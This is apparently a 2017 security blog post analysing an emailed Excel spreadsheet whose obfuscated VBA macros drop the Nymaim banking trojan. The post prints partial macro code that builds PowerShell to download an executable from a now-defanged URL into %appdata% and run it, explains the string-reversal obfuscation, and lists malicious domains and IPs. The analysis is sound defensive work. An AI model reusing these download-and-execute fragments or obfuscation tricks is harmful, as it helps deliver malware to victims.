Banking malware hidden in malicious Excel spreadsheets

We recently discovered a malicious excel file and ran it through Virus Total and only fifteen Anti-Virus vendors detected it as malware (another case of the poor hit rate for AV):


It was commonly identified as ‘X97M/Powmet’ and an online sandbox report gave us the following details:


memurl:"Pattern match:'',''%appdata%.exe,Pattern match:,Heuristic match:,Heuristic match:,Heuristic match:,Heuristic match:,Pattern match:'+$fos+$mo+$uy+$ji+$oe+$fd+$jik+$naw+$mo+$uy+$ji+$oe"

vbaurl:"Heuristic match:"


hosts:",,,,,31.202.198. 37:80,,,,,,94.154.208. 156:80,,"

This shows a number of important details including malicious urls and IP addresses. After receiving more  samples (below) we ran further analysis starting with the initial file: sha256: 228222c7d5b85865b61ca9f5ae47d3699c608b05d158f6882460a9a11bf8a683 


The file type detection tool shows us it was a ‘POIFS’ document, most likely an MS office doc.


Figure 1 POIFS document    

OfficeMalscanner was the obvious choice for working on this file type, and it found the file was an Excel document:


Figure 2 Excel file type

OLE2 compound format document was detected but didn’t show any malicious traces present. In officemalscanner, info parameter can extract the vbmacro code and save it as dump.


Figure 3 VBMacro code Extraction


Figure 4 Extracted files

Now we can manually examine these files, especially ‘ThisWorkbook’ file. That code contains malicious url details in the function:


Figure 5 ThisWorkbook

We tried the same technique with the other excel files and URLS, these were also flagged as malicious: 

Figure 6 VT Result for the link found inside the code


Figure 7 VT Result for downloaded file

Having confirmed the file was indeed malware, we then downloaded that executable for analysis. Before running further analysis, we checked to see if any previous research work had been carried out on this malware family and found it belongs to a banking trojan strain called ‘Nymaim’. Below is the email content:


Figure 8 Email as sample

When we drill down in the email content, we found attachment-related information:


Content-Type: application/zip; name=""

Content-Transfer-Encoding: Base64

Content-Disposition: attachment; filename=""






// removed (… many lines are edited because of the huge size)


We then extracted that code and converted it using base64 code:

Figure 9 before decoding


Figure 10 after decoding

Then we decoded it and – because it starts with ‘PK’ – it is clearly a packed file or zip file. After we unzipped it, we found it contains an excel file and, using the analysis tools, we were able to compare it with the previous file’s code: 


Figure 11 Extracted file from the email file    


Figure 12 Extracted Macros inside the excel from email file

We extracted the file’s macro and compared it to the previous file – both contained the same code:

{h" + "tt" + "p:" + "//" + tmauw + "/news.ex" + "e})) { t^ry { $fg = $ra^n^do^m" + detfrop + "n^e^xt(0, 61132); $"

Function detfrop()

azerba = ""

Functions were heavily obfuscated inside the code. And we have reverse string call then it will be feed as input to other function.

Function burgersfoot()

leopards = "o^" + "D.^" + ")t^n" + "e^" + "il" + "cbe" + "w.^t^e" + "n." + "m^e^t^s" + "y^s" + " t^c" + "ej^bo^-" + "w^en^(^ ;"

burgersfoot = StrReverse(leopards)

For instance  in the above StrReverse - "o^" + "D.^" + ")t^n" + "e^" + "il" + "cbe" + "w.^t^e" + "n." + "m^e^t^s" + "y^s" + " t^c" + "ej^bo^-" + "w^en^(^ ;"

Reversing ‘leopards’ we found the following string - “”. This string is passed on to bugersfoot(). Then bugersfoot() is used in other functions – it keeps on going and makes reversing tough. The best way for us to proceed was to use the compiler and run the code so the behaviour could be observed:

avromit = ferdomon + "e},{h" + "tt" + "p:" + "//" + tmauw + "/news.ex" + "e})) { t^ry { $fg = $ra^n^do^m" + detfrop + "n^e^xt(0, 61132); $"

jasdill = tiommw + " = '%" + Left(kawasa, 1) + tiommw + "da" + "ta%\' + $fg + '.e" + ferdomon + "e'" + burgersfoot

lipokoljd = "w^nl^o^" + "ad^Fi^le($um.ToString(), $pp); St^a^rt-^P" + tiopkas + "st $err^or[0].E^x^cep^ti^on " + "} }"

This avromit is equal to ferdomon plus some other strings. If we look at the strings, it appears to “h+tt+p…” nothing but http:// and it has some functions like as ‘tmauw’ and news.exe so we checked what was in the function ‘tmauw’.

Function tmauw()

siguar = Array(xlZero, Timer(), "o", Timer(), "p.c", Timer(), Minute(Now), Timer(), Timer(), Timer(), "m" & Null, Timer(), Minute(Now), Timer(), Timer(), Timer(), Null)

tmauw = "bif" + Array(siguar(2) + "o" + siguar(4) + "o" + siguar(10))(0)

End Function

Its hxxp://bifoop(.)com/news.exe and is flagged by many AV vendor as malicious. We checked another interesting function and we found a new url so we examined that function too: 

hamnuur = "-Wi^ " & "1 -N^" + "O^Pr^  " + edfoploo + "o^re" + kawasa + " @(" + "{" + newsdews + "tp:/" + "/" + noterdams + "/vol" + detfrop + "e"

In this function, we can see http but need to resolve the noterdams and derfrop functions:

Function detfrop()

azerba = ""

detfrop = Left(Right(azerba, 4), 1)

End Function

Function noterdams()

teamtime = Array(11, Timer(), Minute(Now), "s", Timer(), Timer(), "icn", Timer(), Timer(), Timer(), "" & Null, Timer(), Timer(), Null, Timer(), Timer(), Timer(), 0)

noterdams = "pa" & Array(teamtime(3) & teamtime(6) & teamtime(10) & "m")(0)

End Function

It is contacting hxxp://pasicnyk(.)com which is clearly malicious domain. 


As usual, we recommend disabling the macros in MS office documents. Always be cautious with email attachments, particularly from unknown senders. Finally, we recommend you block those malicious URLS in the firewall and proxy. 


On 2017-07-19

Popular Posts

Privacy Statement | Terms of Use